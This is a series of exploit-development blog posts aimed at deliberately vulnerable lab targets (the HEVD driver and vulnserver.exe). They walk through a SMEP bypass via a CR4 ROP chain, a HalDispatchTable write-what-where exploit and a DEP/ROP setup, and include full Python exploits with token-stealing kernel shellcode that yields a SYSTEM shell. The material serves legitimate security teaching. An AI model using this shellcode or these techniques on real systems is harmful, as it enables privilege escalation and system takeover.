    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

Let’s take a look in WinDbg.

As you can see, we have hit the ret we are going to overwrite.

Before we step through, let’s view the call stack- to see how execution will proceed.

k

Open the image above in a new tab if you are having trouble viewing.

To help better understand the output of the call stack, the column Call Site is going to be the memory address that is executed. The RetAddr column is where the Call Site address will return to when it is done completing.

As you can see, the compromised ret is located at HEVD!TriggerStackOverflow+0xc8. From there we will return to 0xfffff80302c82544, or AuthzBasepRemoveSecurityAttributeValueFromLists+0x70. The next value in the RetAddr column, is the intended value for our CR4 register, 0x00000000000506f8.

Recall that a ret instruction will load RSP into RIP. Therefore, since our intended CR4 value is located on the stack, technically our first ROP gadget would “return” to 0x00000000000506f8. However, the pop rcx will take that value off of the stack and place it into RCX. Meaning we do not have to worry about returning to that value, which is not a valid memory address.

Upon the ret from the pop rcx ROP gadget, we will jump into the next ROP gadget, mov cr4, rcx, which will load RCX into CR4. That ROP gadget is located at 0xfffff80302d87552, or KiFlushCurrentTbWorker+0x12. To finish things out, we have the location of our user mode code, at 0x0000000000b70000.

After stepping through the vulnerable ret instruction, we see we have hit our first ROP gadget.

Now that we are here, stepping through should pop our intended CR4 value into RCX

Perfect. Stepping through, we should land on our next ROP gadget- which will move RCX (desired value to disable SMEP) into CR4.

Perfect! Let’s disable SMEP!

Nice! As you can see, after our ROP gadgets are executed - we hit our breakpoints (placeholder for our shellcode to verify SMEP is disabled)!

This means we have succesfully disabled SMEP, and we can execute usermode shellcode! Let’s finalize this exploit with a working POC. We will merge our payload concepts with the exploit now! Let’s update our script with weaponized shellcode!

import struct
import sys
import os
from ctypes import *

kernel32 = windll.kernel32
ntdll = windll.ntdll
psapi = windll.Psapi


payload = bytearray(
    "\x65\x48\x8B\x04\x25\x88\x01\x00\x00"              # mov rax,[gs:0x188]  ; Current thread (KTHREAD)
    "\x48\x8B\x80\xB8\x00\x00\x00"                      # mov rax,[rax+0xb8]  ; Current process (EPROCESS)
    "\x48\x89\xC3"                                      # mov rbx,rax         ; Copy current process to rbx
    "\x48\x8B\x9B\xE8\x02\x00\x00"                      # mov rbx,[rbx+0x2e8] ; ActiveProcessLinks
    "\x48\x81\xEB\xE8\x02\x00\x00"                      # sub rbx,0x2e8       ; Go back to current process
    "\x48\x8B\x8B\xE0\x02\x00\x00"                      # mov rcx,[rbx+0x2e0] ; UniqueProcessId (PID)
    "\x48\x83\xF9\x04"                                  # cmp rcx,byte +0x4   ; Compare PID to SYSTEM PID
    "\x75\xE5"                                          # jnz 0x13            ; Loop until SYSTEM PID is found
    "\x48\x8B\x8B\x58\x03\x00\x00"                      # mov rcx,[rbx+0x358] ; SYSTEM token is @ offset _EPROCESS + 0x348
    "\x80\xE1\xF0"                                      # and cl, 0xf0        ; Clear out _EX_FAST_REF RefCnt
    "\x48\x89\x88\x58\x03\x00\x00"                      # mov [rax+0x358],rcx ; Copy SYSTEM token to current process
    "\x48\x83\xC4\x40"                                  # add rsp, 0x40       ; RESTORE (Specific to HEVD)
    "\xC3"                                              # ret                 ; Done!
)

# Defeating DEP with VirtualAlloc. Creating RWX memory, and copying our shellcode in that region.
# We also need to bypass SMEP before calling this shellcode
print "[+] Allocating RWX region for shellcode"
ptr = kernel32.VirtualAlloc(
    c_int(0),                         # lpAddress
    c_int(len(payload)),              # dwSize
    c_int(0x3000),                    # flAllocationType
    c_int(0x40)                       # flProtect
)

# Creates a ctype variant of the payload (from_buffer)
c_type_buffer = (c_char * len(payload)).from_buffer(payload)

print "[+] Copying shellcode to newly allocated RWX region"
kernel32.RtlMoveMemory(
    c_int(ptr),                       # Destination (pointer)
    c_type_buffer,                    # Source (pointer)
    c_int(len(payload))               # Length
)

# Need kernel leak to bypass KASLR
# Using Windows API to enumerate base addresses
# We need kernel mode ROP gadgets

# c_ulonglong because of x64 size (unsigned __int64)
base = (c_ulonglong * 1024)()

print "[+] Calling EnumDeviceDrivers()..."

get_drivers = psapi.EnumDeviceDrivers(
    byref(base),                      # lpImageBase (array that receives list of addresses)
    sizeof(base),                     # cb (size of lpImageBase array, in bytes)
    byref(c_long())                   # lpcbNeeded (bytes returned in the array)
)

# Error handling if function fails
if not base:
    print "[+] EnumDeviceDrivers() function call failed!"
    sys.exit(-1)

# The first entry in the array with device drivers is ntoskrnl base address
kernel_address = base[0]

print "[+] Found kernel leak!"
print "[+] ntoskrnl.exe base address: {0}".format(hex(kernel_address))

# Offset to ret overwrite
input_buffer = ("\x41" * 2056)

# SMEP says goodbye
print "[+] Starting ROP chain. Goodbye SMEP..."
input_buffer += struct.pack('<Q', kernel_address + 0x3544)      # pop rcx; ret

print "[+] Flipped SMEP bit to 0 in RCX..."
input_buffer += struct.pack('<Q', 0x506f8)           		        # Intended CR4 value

print "[+] Placed disabled SMEP value in CR4..."
input_buffer += struct.pack('<Q', kernel_address + 0x108552)    # mov cr4, rcx ; ret

print "[+] SMEP disabled!"
input_buffer += struct.pack('<Q', ptr)                          # Location of user mode shellcode

input_buffer_length = len(input_buffer)

# 0x222003 = IOCTL code that will jump to TriggerStackOverflow() function
# Getting handle to driver to return to DeviceIoControl() function
print "[+] Using CreateFileA() to obtain and return handle referencing the driver..."
handle = kernel32.CreateFileA(
    "\\\\.\\HackSysExtremeVulnerableDriver", # lpFileName
    0xC0000000,                         # dwDesiredAccess
    0,                                  # dwShareMode
    None,                               # lpSecurityAttributes
    0x3,                                # dwCreationDisposition
    0,                                  # dwFlagsAndAttributes
    None                                # hTemplateFile
)

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
print "[+] Interacting with the driver..."
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x222003,                           # dwIoControlCode
    input_buffer,                       # lpInBuffer
    input_buffer_length,                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

os.system("cmd.exe /k cd C:\\")

This shellcode adds 0x40 to RSP as you can see from above. This is specific to the process I was exploiting, to resume execution. Also in this case, RAX was already set to 0. Therefore, there was no need to xor rax, rax.

As you can see, SMEP has been bypassed!

SMEP Bypass via PTE Overwrite

Perhaps in another blog I will come back to this. I am going to go back and do some more research on the memory manger unit and memory paging in Windows. When that research has concluded, I will get into the low level details of overwriting page table entries to turn user mode pages into kernel mode pages. In addition, I will go and do more research on pool memory in kernel mode and look into how pool overflows and use-after-free kernel exploits function and behave.

Thank you for joining me along this journey! And thank you to Morten Schenk, Alex Ionescu, and Intel. You all have aided me greatly.

Please feel free to contact me with any suggestions, comments, or corrections! I am open to it all.

Peace, love, and positivity :-)

Exploit Development: Windows Kernel Exploitation - Arbitrary Overwrites (Write-What-Where)

13 November 2019 at 00:00

Introduction

In a previous post, I talked about setting up a Windows kernel debugging environment. Today, I will be building on that foundation produced within that post. Again, we will be taking a look at the HackSysExtreme vulnerable driver. The HackSysExtreme team implemented a plethora of vulnerabilities here, based on the IOCTL code sent to the driver. The vulnerability we are going to take look at today is what is known as an arbitrary overwrite.

At a very high level what this means, is an adversary has the ability to write a piece of data (generally going to be a shellcode) to a particular, controlled location. As you may recall from my previous post, the reason why we are able to obtain local administrative privileges (NT AUTHORITY\SYSTEM) is because we have the ability to do the following:

  1. Allocate a piece of memory in user land that contains our shellcode
  2. Execute said shellcode from the context of ring 0 in kernel land

Since the shellcode is being executed in the context of ring 0, which runs as local administrator, the shellcode will be ran with administrative privileges. Since our shellcode will copy the NT AUTHORITY\SYSTEM token to a cmd.exe process- our shell will be an administrative shell.

Code Analysis

First let’s look at the ArbitraryWrite.h header file.

Take a look at the following snippet:

typedef struct _WRITE_WHAT_WHERE
{
    PULONG_PTR What;
    PULONG_PTR Where;
} WRITE_WHAT_WHERE, *PWRITE_WHAT_WHERE;

typedef in C, allows us to create our own data type. Just as char and int are data types, here we have defined our own data type.

Then, the WRITE_WHAT_WHERE line, is an alias that can be now used to reference the struct _WRITE_WHAT_WHERE. Then lastly, an aliased pointer is created called PWRITE_WHAT_WHERE.

Most importantly, we have a pointer called What and a pointer called Where. Essentially now, WRITE_WHAT_WHERE refers to this struct containing What and Where. PWRITE_WHAT_WHERE, when referenced, is a pointer to this struct.

Moving on down the header file, this is presented to us:

NTSTATUS
TriggerArbitraryWrite(
    _In_ PWRITE_WHAT_WHERE UserWriteWhatWhere
);

Now, the variable UserWriteWhatWhere has been attributed to the datatype PWRITE_WHAT_WHERE. As you can recall from above, PWRITE_WHAT_WHERE is a pointer to the struct that contains What and Where pointers (Which will be exploited later on). From now on UserWriteWhatWhere also points to the struct.

Let’s move on to the source file, ArbitraryWrite.c.

The above function, TriggerArbitraryWrite() is passed to the source file.

Then, the What and Where pointers declared earlier in the struct, are initialized as NULL pointers:

PULONG_PTR What = NULL;
PULONG_PTR Where = NULL;

Then finally, we reach our vulnerability:

#else
        DbgPrint("[+] Triggering Arbitrary Write\n");

        //
        // Vulnerability Note: This is a vanilla Arbitrary Memory Overwrite vulnerability
        // because the developer is writing the value pointed by 'What' to memory location
        // pointed by 'Where' without properly validating if the values pointed by 'Where'
        // and 'What' resides in User mode
        //

        *(Where) = *(What);

As you can see, an adversary could write the value pointed by What to the memory location referenced by Where. The real issue is that there is no validation, using a Windows API function such as ProbeForRead() and ProbeForWrite, that confirms whether or not the values of What and Where reside in user mode. Knowing this, we will be able to utilize our user mode shellcode going forward for the exploit.

IOCTL

As you can recall in the last blog, the IOCTL code that was used to interact with the HEVD vulnerable driver and take advantage of the TriggerStackOverflow() function, occurred at this routine:

After tracing the IOCTL routine that jumps into the TriggerArbitraryOverwrite() function, here is what is displayed:

The above routine is part of a chain as displayed as below:

Now time to calculate the IOCTL code- which allows us to interact with the vulnerable routine. Essentially, look at the very first routine from above, that was utilized for my last blog post. The IOCTL code was 0x222003. (Notice how the value is only 6 digits, even though x86 requires 8 digits in a memory address. 0x222003 = 0x00222003) The instruction of sub eax, 0x222003 will yield a value of zero, and the jz short loc_155FB (jump if zero) will jump into the TriggerStackOverflow() function. So essentially using deductive reasoning, EAX contains a value of 0x222003 at the time the jump is taken.

Looking at the second and third routines in the image above:

sub eax, 4
jz short loc_155E3

and

sub eax, 4
jz short loc_155CB

Our goal is to successfully complete the “jump if zero” jump into the applicable vulnerability. In this case, the third routine shown above, will lead us directly into the TriggerArbitraryOverwrite(), if the corresponding “jump if zero” jump is completed.

If EAX is currently at 0x222003, and EAX is subtracted a total of 8 times, let’s try adding 8 to the current IOCTL code from the last exploit- 0x222003. Adding 8 will give us a value of 0x22200B, or 0x0022200B as a legitimate x86 value. That means by the time the value of EAX reaches the last routine, it will equal 0x222003 and make the applicable jump into the TriggerArbitraryOverwrite() function!

Proof Of Concept

Utilizing the newly calculated IOCTL, let’s create a POC:

import struct
import sys
import os
from ctypes import *
from subprocess import *

# DLLs for Windows API interaction
kernel32 = windll.kernel32
ntdll = windll.ntdll
psapi = windll.Psapi

# Getting handle to driver to return to DeviceIoControl() function
print "[+] Using CreateFileA() to obtain and return handle referencing the driver..."
handle = kernel32.CreateFileA(
    "\\\\.\\HackSysExtremeVulnerableDriver", # lpFileName
    0xC0000000,                         # dwDesiredAccess
    0,                                  # dwShareMode
    None,                               # lpSecurityAttributes
    0x3,                                # dwCreationDisposition
    0,                                  # dwFlagsAndAttributes
    None                                # hTemplateFile
)

poc = "\x41\x41\x41\x41"                # What
poc += "\x42\x42\x42\x42"               # Where
poc_length = len(poc)

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    poc,                                # lpInBuffer
    poc_length,                         # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

After setting up the debugging environment, run the POC. As you can see- What and Where have been cleanly overwritten!:

HALp! How Do I Hax?

At the current moment, we have the ability to write a given value at a certain location. How does this help? Let’s talk a bit more on the ability to execute user mode shellcode from kernel mode.

In the stack overflow vulnerability, our user mode memory was directly copied to kernel mode- without any check. In this case, however, things are not that straight forward. Here, there is no memory copy DIRECTLY to kernel mode.

However, there is one way we can execute user mode shellcode from kernel mode. Said way is via the HalDispatchTable (Hardware Abstraction Layer Dispatch Table).

Let’s talk about why we are doing what we are doing, and why the HalDispatchTable is important.

The hardware abstraction layer, in Windows, is a part of the kernel that provides routines dealing with hardware/machine instructions. Basically it allows multiple hardware architectures to be compatible with Windows, without the need for a different version of the operating system.

Having said that, there is an undocumented Windows API function known as NtQueryIntervalProfile().

What does NtQueryIntervalProfile() have to do with the kernel? How does the HalDispatchTable even help us? Let’s talk about this.

If you disassemble the NtQueryIntervalProfile() in WinDbg, you will see that a function called KeQueryIntervalProfile() is called in this function:

uf nt!NtQueryIntervalProfile:

If we disassemble the KeQueryIntervalProfile(), you can see the HalDispatchTable actually gets called by this function, via a pointer!

uf nt!KeQueryIntervalProfile:

Essentially, the address at HalDispatchTable + 0x4, is passed via KeQueryIntervalProfile(). If we can overwrite that pointer with a pointer to our user mode shellcode, natural execution will eventually execute our shellcode, when NtQueryIntervalProfile() (which calls KeQueryIntervalProfile()) is called!

Order Of Operations

Here are the steps we need to take, in order for this to work:

  1. Enumerate all drivers addresses via EnumDeviceDrivers()
  2. Sort through the list of addresses for the address of ntkornl.exe (ntoskrnl.exe exports KeQueryIntervalProfile())
  3. Load ntoskrnl.exe handle into LoadLibraryExA and then enumerate the HalDispatchTable address via GetProcAddress
  4. Once the HalDispatchTable address is found, we will calculate the address of HalDispatchTable + 0x4 (by adding 4 bytes), and overwrite that pointer with a pointer to our user mode shellcode

EnumDeviceDrivers()

# Enumerating addresses for all drivers via EnumDeviceDrivers()
base = (c_ulong * 1024)()
get_drivers = psapi.EnumDeviceDrivers(
    byref(base),                      # lpImageBase (array that receives list of addresses)
    c_int(1024),                      # cb (size of lpImageBase array, in bytes)
    byref(c_long())                   # lpcbNeeded (bytes returned in the array)
)

# Error handling if function fails
if not base:
    print "[+] EnumDeviceDrivers() function call failed!"
    sys.exit(-1)

This snippet of code enumerates the base addresses for the drivers, and exports them to an array. After the base addresses have been enumerated, we can move on to finding the address of ntoskrnl.exe

ntoskrnl.exe

# Cycle through enumerated addresses, for ntoskrnl.exe using GetDeviceDriverBaseNameA()
for base_address in base:
    if not base_address:
        continue
    current_name = c_char_p('\x00' * 1024)
    driver_name = psapi.GetDeviceDriverBaseNameA(
        base_address,                 # ImageBase (load address of current device driver)
        current_name,                 # lpFilename
        48                            # nSize (size of the buffer, in chars)
    )

    # Error handling if function fails
    if not driver_name:
        print "[+] GetDeviceDriverBaseNameA() function call failed!"
        sys.exit(-1)

    if current_name.value.lower() == 'ntkrnl' or 'ntkrnl' in current_name.value.lower():

        # When ntoskrnl.exe is found, return the value at the time of being found
        current_name = current_name.value

        # Print update to show address of ntoskrnl.exe
        print "[+] Found address of ntoskrnl.exe at: {0}".format(hex(base_address))

        # It assumed the information needed from the for loop has been found if the program has reached execution at this point.
        # Stopping the for loop to move on.
        break

This is a snippet of code that essentially will loop through the array where all of the base addresses have been exported to, and search for ntoskrnl.exe via GetDeviceDriverBaseNameA(). Once that has been found, the address will be stored.

LoadLibraryExA()

# Beginning enumeration
kernel_handle = kernel32.LoadLibraryExA(
    current_name,                       # lpLibFileName (specifies the name of the module, in this case ntlkrnl.exe)
    None,                               # hFile (parameter must be null)
    0x00000001                          # dwFlags (DONT_RESOLVE_DLL_REFERENCES)
)

# Error handling if function fails
if not kernel_handle:
    print "[+] LoadLibraryExA() function failed!"
    sys.exit(-1)

In this snippet, LoadLibraryExA() receives the handle from GetDeviceDriverBaseNameA() (which is ntoskrnl.exe in this case). It then proceeds, in the snippet below, to pass the handle loaded into memory (which is still ntoskrnl.exe) to the function GetProcAddress().

GetProcAddress()

hal = kernel32.GetProcAddress(
    kernel_handle,                      # hModule (handle passed via LoadLibraryExA to ntoskrnl.exe)
    'HalDispatchTable'                  # lpProcName (name of value)
)

# Subtracting ntoskrnl base in user mode
hal -= kernel_handle

# Add base address of ntoskrnl in kernel mode
hal += base_address

# Recall earlier we were more interested in HAL + 0x4. Let's grab that address.
real_hal = hal + 0x4

# Print update with HAL and HAL + 0x4 location
print "[+] HAL location: {0}".format(hex(hal))
print "[+] HAL + 0x4 location: {0}".format(hex(real_hal))

GetProcAddress() will reveal to us the address of the HalDispatchTable and HalDispatchTable + 0x4. We are more interested in HalDispatchTable + 0x4.

Once we have the address for HalDispatchTable + 0x4, we can weaponize our exploit:

# HackSysExtreme Vulnerable Driver Kernel Exploit (Arbitrary Overwrite)
# Author: Connor McGarr

import struct
import sys
import os
from ctypes import *
from subprocess import *

# DLLs for Windows API interaction
kernel32 = windll.kernel32
ntdll = windll.ntdll
psapi = windll.Psapi

class WriteWhatWhere(Structure):
    _fields_ = [
        ("What", c_void_p),
        ("Where", c_void_p)
    ]

payload = bytearray(
    "\x90\x90\x90\x90"                # NOP sled
    "\x60"                            # pushad
    "\x31\xc0"                        # xor eax,eax
    "\x64\x8b\x80\x24\x01\x00\x00"    # mov eax,[fs:eax+0x124]
    "\x8b\x40\x50"                    # mov eax,[eax+0x50]
    "\x89\xc1"                        # mov ecx,eax
    "\xba\x04\x00\x00\x00"            # mov edx,0x4
    "\x8b\x80\xb8\x00\x00\x00"        # mov eax,[eax+0xb8]
    "\x2d\xb8\x00\x00\x00"            # sub eax,0xb8
    "\x39\x90\xb4\x00\x00\x00"        # cmp [eax+0xb4],edx
    "\x75\xed"                        # jnz 0x1a
    "\x8b\x90\xf8\x00\x00\x00"        # mov edx,[eax+0xf8]
    "\x89\x91\xf8\x00\x00\x00"        # mov [ecx+0xf8],edx
    "\x61"                            # popad
    "\x31\xc0"                        # xor eax, eax (restore execution)
    "\x83\xc4\x24"                    # add esp, 0x24 (restore execution)
    "\x5d"                            # pop ebp
    "\xc2\x08\x00"                    # ret 0x8
)

# Defeating DEP with VirtualAlloc. Creating RWX memory, and copying our shellcode in that region.
print "[+] Allocating RWX region for shellcode"
ptr = kernel32.VirtualAlloc(
    c_int(0),                         # lpAddress
    c_int(len(payload)),              # dwSize
    c_int(0x3000),                    # flAllocationType
    c_int(0x40)                       # flProtect
)

# Creates a ctype variant of the payload (from_buffer)
c_type_buffer = (c_char * len(payload)).from_buffer(payload)

print "[+] Copying shellcode to newly allocated RWX region"
kernel32.RtlMoveMemory(
    c_int(ptr),                       # Destination (pointer)
    c_type_buffer,                    # Source (pointer)
    c_int(len(payload))               # Length
)

# Python, when using id to return a value, creates an offset of 20 bytes ot the value (first bytes reference variable)
# After id returns the value, it is then necessary to increase the returned value 20 bytes
payload_address = id(payload) + 20
payload_updated = struct.pack("<L", ptr)
payload_final = id(payload_updated) + 20

# Location of shellcode update statement
print "[+] Location of shellcode: {0}".format(hex(payload_address))

# Location of pointer to shellcode
print "[+] Location of pointer to shellcode: {0}".format(hex(payload_final))

# The goal is to eventually locate HAL table.
# HAL is exported by ntoskrnl.exe
# ntoskrnl.exe's location can be enumerated via EnumDeviceDrivers() and GetDEviceDriverBaseNameA() functions via Windows API.

# Enumerating addresses for all drivers via EnumDeviceDrivers()
base = (c_ulong * 1024)()
get_drivers = psapi.EnumDeviceDrivers(
    byref(base),                      # lpImageBase (array that receives list of addresses)
    c_int(1024),                      # cb (size of lpImageBase array, in bytes)
    byref(c_long())                   # lpcbNeeded (bytes returned in the array)
)

# Error handling if function fails
if not base:
    print "[+] EnumDeviceDrivers() function call failed!"
    sys.exit(-1)

# Cycle through enumerated addresses, for ntoskrnl.exe using GetDeviceDriverBaseNameA()
for base_address in base:
    if not base_address:
        continue
    current_name = c_char_p('\x00' * 1024)
    driver_name = psapi.GetDeviceDriverBaseNameA(
        base_address,                 # ImageBase (load address of current device driver)
        current_name,                 # lpFilename
        48                            # nSize (size of the buffer, in chars)
    )

    # Error handling if function fails
    if not driver_name:
        print "[+] GetDeviceDriverBaseNameA() function call failed!"
        sys.exit(-1)

    if current_name.value.lower() == 'ntkrnl' or 'ntkrnl' in current_name.value.lower():

        # When ntoskrnl.exe is found, return the value at the time of being found
        current_name = current_name.value

        # Print update to show address of ntoskrnl.exe
        print "[+] Found address of ntoskrnl.exe at: {0}".format(hex(base_address))

        # It assumed the information needed from the for loop has been found if the program has reached execution at this point.
        # Stopping the for loop to move on.
        break
    
# Now that all of the proper information to reference HAL has been enumerated, it is time to get the location of HAL and HAL 0x4
# NtQueryIntervalProfile is an undocumented Windows API function that references HAL at the location of HAL +0x4.
# HAL +0x4 is the address we will eventually need to write over. Once HAL is exported, we will be most interested in HAL + 0x4

# Beginning enumeration
kernel_handle = kernel32.LoadLibraryExA(
    current_name,                       # lpLibFileName (specifies the name of the module, in this case ntlkrnl.exe)
    None,                               # hFile (parameter must be null
    0x00000001                          # dwFlags (DONT_RESOLVE_DLL_REFERENCES)
)

# Error handling if function fails
if not kernel_handle:
    print "[+] LoadLibraryExA() function failed!"
    sys.exit(-1)

# Getting HAL Address
hal = kernel32.GetProcAddress(
    kernel_handle,                      # hModule (handle passed via LoadLibraryExA to ntoskrnl.exe)
    'HalDispatchTable'                  # lpProcName (name of value)
)

# Subtracting ntoskrnl base in user mode
hal -= kernel_handle

# Add base address of ntoskrnl in kernel mode
hal += base_address

# Recall earlier we were more interested in HAL + 0x4. Let's grab that address.
real_hal = hal + 0x4

# Print update with HAL and HAL + 0x4 location
print "[+] HAL location: {0}".format(hex(hal))
print "[+] HAL + 0x4 location: {0}".format(hex(real_hal))

# Referencing class created at the beginning of the sploit and passing shellcode to vulnerable pointers
# This is where the exploit occurs
write_what_where = WriteWhatWhere()
write_what_where.What = payload_final   # What we are writing (our shellcode)
write_what_where.Where = real_hal       # Where we are writing it to (HAL + 0x4). NtQueryIntervalProfile() will eventually call this location and execute it
write_what_where_pointer = pointer(write_what_where)

# Print update statement to reflect said exploit
print "[+] What: {0}".format(hex(write_what_where.What))
print "[+] Where: {0}".format(hex(write_what_where.Where))


# Getting handle to driver to return to DeviceIoControl() function
print "[+] Using CreateFileA() to obtain and return handle referencing the driver..."
handle = kernel32.CreateFileA(
    "\\\\.\\HackSysExtremeVulnerableDriver", # lpFileName
    0xC0000000,                         # dwDesiredAccess
    0,                                  # dwShareMode
    None,                               # lpSecurityAttributes
    0x3,                                # dwCreationDisposition
    0,                                  # dwFlagsAndAttributes
    None                                # hTemplateFile
)

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    write_what_where_pointer,           # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)
    
# Actually calling NtQueryIntervalProfile function, which will call HAL + 0x4, where our shellcode will be waiting.
ntdll.NtQueryIntervalProfile(
    0x1234,
    byref(c_ulong())
)

# Print update for nt_autority\system shell
print "[+] Enjoy the NT AUTHORITY\SYSTEM shell!!!!"
Popen("start cmd", shell=True)

There is a lot to digest here. Let’s look at the following:

# Referencing class created at the beginning of the sploit and passing shellcode to vulnerable pointers
# This is where the exploit occurs
write_what_where = WriteWhatWhere()
write_what_where.What = payload_final   # What we are writing (our shellcode)
write_what_where.Where = real_hal       # Where we are writing it to (HAL + 0x4). NtQueryIntervalProfile() will eventually call this location and execute it
write_what_where_pointer = pointer(write_what_where)

# Print update statement to reflect said exploit
print "[+] What: {0}".format(hex(write_what_where.What))
print "[+] Where: {0}".format(hex(write_what_where.Where))

Here, is where the What and Where come into play. We create a variable called write_what_where and we call the What pointer from the class created called WriteWhatWhere(). That value gets set to equal the address of a pointer to our shellcode. The same thing happens with Where, but it receives the value of HalDispatchTable + 0x4. And in the end, a pointer to the variable write_what_where, which has inherited all of our useful information about our pointer to the shellcode and HalDispatchTable + 0x4, is passed in the DeviceIoControl() function, which actually interacts with the driver.

One last thing. Take a peak here:

# Actually calling NtQueryIntervalProfile function, which will call HAL + 0x4, where our shellcode will be waiting.
ntdll.NtQueryIntervalProfile(
    0x1234,
    byref(c_ulong())
)

The whole reason this exploit works in the first place, is because after everything is in place, we call NtQueryIntervalProfile(). Although this function never receives any of our parameters, pointers, or variables- it does not matter. Our shellcode will be located at HalDispatchTable + 0x4 BEFORE the call to NtQueryIntervalProfile(). Calling NtQueryIntervalProfile() ensures that location of HalDispatchTable + 0x4 (because NtQueryIntervalProfile() calls KeQueryIntervalProfile(), which calls HalDispatchTable + 0x4) gets executed. And then just like that- our payload will be executed!

All Together Now

Final execution of the exploit- and we have an administrative shell!! Pwn all of the things!

Wrapping Up

Thanks again to the HackSysExtreme team for their vulnerable driver, and other fellow security researchers like rootkit for their research! As I keep going down the kernel route, I hope to be making it over to x64 here in the near future! Please contact me with any questions, comments, or corrections!

Peace, love, and positivity! :-)

Exploit Development: Hands Up! Give Us the Stack! This Is a ROPpery!

21 September 2019 at 00:00

Introduction

Over the years, the security community as a whole realized that there needed to be a way to stop exploit developers from easily executing malicious shellcode. Microsoft, over time, has implemented a plethora of intense exploit mitigations, such as: EMET (the Enhanced Mitigation Experience Toolkit), CFG (Control Flow Guard), Windows Defender Exploit Guard, and ASLR (Address Space Layout Randomization).

DEP, or Data Execution Prevention, is another one of those roadblocks that hinders exploit developers. This blog post will only be focusing on defeating DEP, within a stack-based data structure on Windows.

A Brief Word About DEP

Windows XP SP2 32-bit was the first Windows operating system to ship DEP. Every version of Windows since then has included DEP. DEP, at a high level, gives memory two independent permission levels. They are:

  • The ability to write to memory.

    OR

  • The ability to execute memory.

But not both.

What this means, is that someone cannot write AND execute memory at the same time. This means a few things for exploit developers. Let’s say you have a simple vanilla stack instruction pointer overwrite. Let’s also say the first byte, and all of the following bytes of your payload, are pointed to by the stack pointer. Normally, a simple jmp stack pointer instruction would suffice- and it would rain shells. With DEP, it is not that simple. Since that shellcode is user introduced shellcode- you will be able to write to the stack. BUT, as soon as any execution of that user supplied shellcode is attempted- an access violation will occur, and the application will terminate.

DEP manifests itself in four different policy settings. From the MSDN documentation on DEP, here are the four policy settings:

Knowing the applicable information on how DEP is implemented, figuring how to defeat DEP is the next viable step.

Windows API, We Meet Again

In my last post, I explained and outlined how powerful the Windows API is. Microsoft has released all of the documentation on the Windows API, which aids in reverse engineering the parameters needed for API function calls.

Defeating DEP is no different. There are many API functions that can be used to defeat DEP. A few of them include:

The only limitation to defeating DEP, is the number of applicable APIs in Windows that change the permissions of the memory containing shellcode.

For this post, VirtualProtect() will be the Windows API function used for bypassing DEP.

VirtualProtect() takes the following parameters:

BOOL VirtualProtect(
  LPVOID lpAddress,
  SIZE_T dwSize,
  DWORD  flNewProtect,
  PDWORD lpflOldProtect
);

lpAddress = A pointer an address that describes the starting page of the region of pages whose access protection attributes are to be changed.

dwSize = The size of the region whose access protection attributes are to be changed, in bytes.

flNewProtect = The memory protection option. This parameter can be one of the memory protection constants. (0x40 sets the permissions of the memory page to read, write, and execute.)

lpflOldProtect = A pointer to a variable that receives the previous access protection value of the first page in the specified region of pages. (This should be any address that already has write permissions.)

Now this is all great and fine, but there is a question one should be asking themselves. If it is not possible to write the parameters to the stack and also execute them, how will the function get ran?

Let’s ROP!

This is where Return Oriented Programming comes in. Even when DEP is enabled, it is still possible to perform operations on the stack such as push, pop, add, sub, etc.

“How is that so? I thought it was not possible to write and execute on the stack?” This is a question you also may be having. The way ROP works, is by utilizing pointers to instructions that already exist within an application.

Let’s say there’s an application called vulnserver.exe. Let’s say there is a memory address of 0xDEADBEEF that when viewed, contains the instruction add esp, 0x100. If this memory address got loaded into the instruction pointer, it would execute the command it points to. But nothing user supplied was written to the stack.

What this means for exploit developers, is this. If one is able to chain a set of memory addresses together, that all point to useful instructions already existing in an application/system- it might be possible to change the permissions of the memory pages containing malicious shellcode. Let’s get into how this looks from a practicality/hands-on approach.

If you would like to follow along, I will be developing this exploit on a 32-bit Windows 7 virtual machine with ASLR disabled. The application I will be utilizing is vulnserver.exe.

A Brief Introduction to ROP Gadgets and ROP Chains

The reason why ROP is called Return Oriented Programming, is because each instruction is always followed by a ret instruction. Each ASM + ret instruction is known as a ROP gadget. Whenever these gadgets are loaded consecutively one after the other, this is known as a ROP chain.

The ret is probably the most important part of the chain. The reason the return instruction is needed is simple. Let’s say you own the stack. Let’s say you are able to load your whole ROP chain onto the stack. How would you execute it?

Enter ret. A return instruction simply takes whatever is located in the stack pointer (on top of the stack) and loads it into the instruction pointer (what is currently being executed). Since the ROP chain is located on the stack and a ROP chain is simply a bunch of memory addresses, the ret instruction will simply return to the stack, pick up the next memory address (ROP gadget), and execute it. This will keep happening, until there are no more left! This makes life a bit easier.

POC

Enough jibber jabber- here is the POC for vulnserver.exe:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+filler)
s.close()

..But …But What About Jumping to ESP?

There will not be a jmp esp instruction here. Remember, with DEP- this will kill the exploit. Instead, you’ll need to find any memory address that contains a ret instruction. As outlined above, this will directly take us back to the stack. This is normally called a stack pivot.

Where Art Thou ROP Gadgets?

